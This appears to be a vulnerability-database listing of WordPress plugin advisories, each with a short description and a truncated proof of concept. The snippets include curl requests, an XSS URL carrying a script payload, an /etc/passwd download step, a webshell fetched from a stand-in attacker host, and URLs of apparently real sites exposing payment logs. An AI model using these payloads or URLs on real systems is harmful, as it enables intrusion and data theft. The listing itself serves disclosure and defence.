4359 matches found
Popup Builder < 4.2.3 - Unauthenticated Stored XSS
Description The plugin does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks. 1 Create a popup using the plugin 2 Run the following curl command, switching $POPUPID with that popup's ID: curl --url...
Download Manager < 3.2.83 - Unauthenticated Protected File Download Password Leak
Description The plugin does not protect file download's passwords, leaking it upon receiving an invalid one. 223 being the ID of a password protected download: curl -X POST --data 'wpdmID=223&dataType=json&execute=wpdmgetlink&action=wpdmajaxcall&password=123322'...
Backup Migration Staging < 1.3.6 - Sensitive Data Exposure
Description The plugin stores in-progress backups information in easy to find, publicly-accessible files, which may allow attackers monitoring those to leak sensitive information from the site's backups. 1 Run a backup of the site 2 Notice the following files are all publicly available while the...
PayHere Payment Gateway < 2.2.12 - Unauthenticated Log Data Disclosure
Description The plugin automatically creates publicly-accessible log files containing sensitive information when transactions occur. https://www.suppliment.lk/wp-content/uploads/payhere-logs/?SD https://www.medic.lk/wp-content/uploads/payhere-logs/?SD...
Html5 Video Player < 2.5.19 - Subscriber+ Stored XSS
Description The plugin does not sanitise and escape some of its player settings, which combined with missing capability checks around the plugin could allow any authenticated users, such as low as subscribers to perform Stored Cross-Site Scripting attacks against high privilege users like admins...
Elementor < 3.18.2 - Contributor+ Arbitrary File Upload to RCE via Template Import
Description The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server. 1. Edit a post in Elementor. 2. Import a template folder...
ArtPlacer Widget < 2.20.7 - Editor+ SQLi
Description The plugin does not sanitize and escape the "id" parameter before submitting the query, leading to a SQLI exploitable by editors and above. Note: Due to the lack of CSRF check, the issue could also be exploited via a CSRF against a logged editor or above As an editor, open...
WP Staging (Free < 3.1.3, Pro < 5.1.3) - Unauthenticated Backup Download
Description The plugin does not prevent visitors from leaking key information about ongoing backups processes, allowing unauthenticated attackers to download said backups later. The plugin creates temporary cache files when backing up sites, which are publicly accessible to anyone. Said cache fil...
Royal Elementor Addons and Templates < 1.3.81 - Unauthenticated Arbitrary Post Read
Description The plugin does not ensure that users accessing posts via an AJAX action and REST endpoint, currently disabled in the plugin have the right to do so, allowing unauthenticated users to access arbitrary draft, private and password protected posts/pages content WooCommerce needs to be...
Ecwid Ecommerce Shopping Cart < 6.12.5 - Arbitrary Plugin Settings Change via CSRF
Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack. http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=ecwidstorefrontsetpageslug&slug=hehehehe Besides, you can disable the...
JSON Content Importer < 1.5.4 - Reflected XSS
Description The plugin does not sanitise and escape the tab parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin Make a logged in admin open:...
Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure
Description The plugin does not disallow listing the backups-dup-lite/tmp directory or the backups-dup-pro/tmp directory in the Pro version, which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to...
Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion
Description The plugin does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server To download /etc/passwd: curl...
WP Sessions Time Monitoring Full Automatic < 1.0.9 - Unauthenticated SQL injection
Description The plugin does not sanitize the request URL or query parameters before using them in an SQL query, allowing unauthenticated attackers to extract sensitive data from the database via blind time based SQL injection techniques, or in some cases an error/union based technique. Blind time...
Quiz Maker < 6.4.9.5 - Unauthenticated Email Address Disclosure
Description The plugin does not adequately authorize the aysquizauthorusersearch AJAX action, allowing an unauthenticated attacker to perform a search for users of the system, ultimately leaking user email addresses. import string import requests baseurl =...
Quiz Maker < 6.4.9.5 - Reflected Cross-Site Scripting
Description The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting Visit the following URL: https://example.com/wp-admin/admin.php?page=quiz-maker-questions&fake%22%3E%3Cscript%3Ealert/xss/%3C/script%3E=something...
rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Subscriber+ RCE
Description The plugin does not validate files to be uploaded, which could allow attackers with a low-privilege account e.g. subscribers to upload arbitrary files such as PHP on the server If plugin JSON API is enabled, any logged-in user may execute arbitrary code by uploading a PHP file. After...
BestWebSoft's Like & Share < 2.74 - Unauthenticated Password Protected Post Read
Description The plugin discloses the content of password protected posts to unauthenticated users via a meta tag In the web browser, view the source of any password protected post and check the og:description meta tag...
rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Admin+ RCE
Description The plugin loads the contents of the import file in an unsafe manner, leading to remote code execution by privileged users. 1. As an admin, visit rtMedia Settings Export/Import. 2. Click the "Browse File" button beside "Import rtMedia Settings". 3. Upload a file with the extension .js...
WP Mail Log < 1.1.3 – Incorrect Authorization in REST API Endpoints
Description The plugin does not correctly authorize its REST API endpoints, allowing users with the Contributor role to view and delete data that should only be accessible to Admin users. The following actions may be taken by a Contributor user: --- /wmllogs - Information leak Execute the followi...
WP Mail Log < 1.1.3 – Contributor+ LFI in wml_logs/send_mail endpoint
Description The plugin does not properly validate file path parameters when attaching files to emails, leading to local file inclusion, and allowing an attacker to leak the contents of arbitrary files. Run the following within any page on the site, ensuring that the id parameter is set to a valid...
WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs/send_mail endpoint
Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor. Run the following within any page on the site. Notice that the request is delayed by the SLEEP call in th...
WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs endpoint
Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor. Run the following within a block editor page. Notice that the request is delayed by the SLEEP call in the...
WP Crowdfunding < 2.1.8 - Admin+ Stored XSS
Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Add a campaign and for the reward...
BSK Forms Blacklist < 3.7 - Admin+ Stored Cross-Site Scripting
Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup. 1. In the plugin settings ex:...
WP Mail Log < 1.1.3 – Contributor+ Arbitrary File Upload to RCE
Description The plugin does not properly validate file extensions uploading files to attach to emails, allowing attackers to upload PHP files, leading to remote code execution. Run the following JS code in any page on the server, setting the id variable to a valid ID of a log entry on the server...
Swift Performance Lite <= 2.3.6.14 - Unauthenticated Configuration Export
Description The plugin does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens. curl --url 'http://vulnerable-site.tld/wp-admin/admin-post.php?luv-action=export'...
so-widgets-bundle < 1.51.0 - Admin+ Local File Inclusion
Description The plugin does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites. 1. Create a multi-site wordpress setup, i.e. using docker-containers,...
Theme My Login 2FA < 1.2 - Lack of Rate Limiting
Description The plugin does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities, which shouldn't be too long, as the 2FA codes are 6 digits. https://packetstormsecurity.com/2309-exploits/wpmylogin-bruteforce.txt...
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
Slider - Ultimate Responsive Image Slider < 3.5.12 - Subscriber+ Arbitrary Post Access
Description The plugin does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated users, such as subscriber to access the content arbitrary post such as private, draft and password protected Run the below...
The Events Calendar < 6.2.8.1 - Unauthenticated Arbitrary Password Protected Post Read
Description The plugin discloses the content of password protected posts to unauthenticated users via a crafted request Append "?view=single-event" to a password protected post, then view the source of the page and find the post content disclosed in Example:...
SmartCrawl WordPress SEO checker < 3.8.3 - Unauthenticated Password Protected Post Disclosure
Description The plugin does not prevent unauthorised users from accessing password-protected posts' content. As unauthenticated, view the source via the web browser of any password protected post and find The content of the post will be disclosed in the meta and script tags after this, example:...
WP All Export (Free < 1.4.0, Pro < 1.8.6) - Admin+ RCE
Description The plugin does not validate and sanitise the wpquery parameter which allows an attacker to run arbitrary command on the remote server 1. Go to "All Export" "New Export" 2. Select "WP Query Results" as the export type 3. Enter the payload phpinfo for the query. 4. Click customize and...
Quttera Web Malware Scanner < 3.4.2.1 - Directory Listing to Sensitive Data Exposure
Description The plugin doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code http://yoursite/wordpress/wp-content/plugins/quttera-web-malware-scanner/runtime.log...
Product Catalog Enquiry for WooCommerce < 5.0.3 - Unauthenticated Stored XSS via Arbitrary Setting Update
Description The plugin does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users. 1 Make sure the plugin is configured with the "Catalog Mode" activated. 2 Launch the following from your browser's console:...
Autocomplete Location field Contact Form 7 < 3.0 - Admin+ Store Cross-Site Scripting
Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Go to "Contact Google Place API" 2...
WP All Export (Free < 1.4.1, Pro < 1.8.6) - Remote Code Execution via CSRF
Description The plugin does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged in users perform unwanted actions leading to remote code execution. Submit the following form as a Super Admin notice that it does not contain a nonce. Despite the error,...
Quttera Web Malware Scanner < 3.4.2.1 - Admin+ Path Traversal
Description IThe plugin does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks 1 Go to http://yoursite/wordpress/wp-admin/admin.php?page=qutterawmscannerint 2 Click "Scan Now" 3 Click "Detected Threats" 4 Navigate to some Suspicio...
WP All Export (Free < 1.4.1, Pro < 1.8.6) - Author+ PHAR Deserialization via CSRF
Description The plugin does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution. 1. Ensure your WordPress...
EmbedPress < 3.9.2 - Reflected XSS
Description The plugin does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin Make a logged in admin open a page containing the HTML code below " / " /...
File Manager < 6.3 - Admin+ Arbitrary OS File/Folder Access + Path Traversal
Description The plugin does not restrict the file managers root directory, allowing an administrator to set a root outside of the WordPress root directory, giving access to system files and directories even in a multisite setup, where site administrators should not be allowed to modify the sites...
EazyDocs < 2.3.4 - Subscriber + SQLi
Description The plugin does not properly sanitize and escape "data" parameter before using it in an SQL statement via an AJAX action, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks. 1. Create a document then create some sections in the document 2...
EmbedPress < 3.9.2 - Reflected XSS
Description The plugin does not sanitise and escape a parameter before outputting it back in the page containing a specific content, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin On a post/page where containing the following output whic...
LearnPress < 4.2.5.5 - Reflected Cross-Site Scripting
Description The plugin does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. Make a logged in admin open v 4.2.5.2 -...
WP Not Login Hide <= 1.0 - Admin+ Stored XSS
Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Visit the "WPNLH" interface availab...
Contact Form Email < 1.3.44 - Editor+ Stored Cross-Site Scripting
Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Create a form and navigate to 'Edit...
Popup box < 3.8.6 - Admin+ Stored XSS in Popup Settings
Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Add a new Popup 2. In the "Popups...
Easy Newsletter Signups <= 1.0.4 - Admin+ SQLi
Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin 1. From the "Easy Newsletter Signups", select an email address and then click "Export to CSV" 2. Intercept the...
Frontend File Manager < 22.7 - Editor+ Arbitrary File Download
Description The plugin has a vulnerability that allows an Editor+ user to bypass the file download logic and download files such as wp-config.php 1 Create new post with this shortcode - ffmwp 2 Go to new post and upload any file 3 After that go to main page of plugin for users...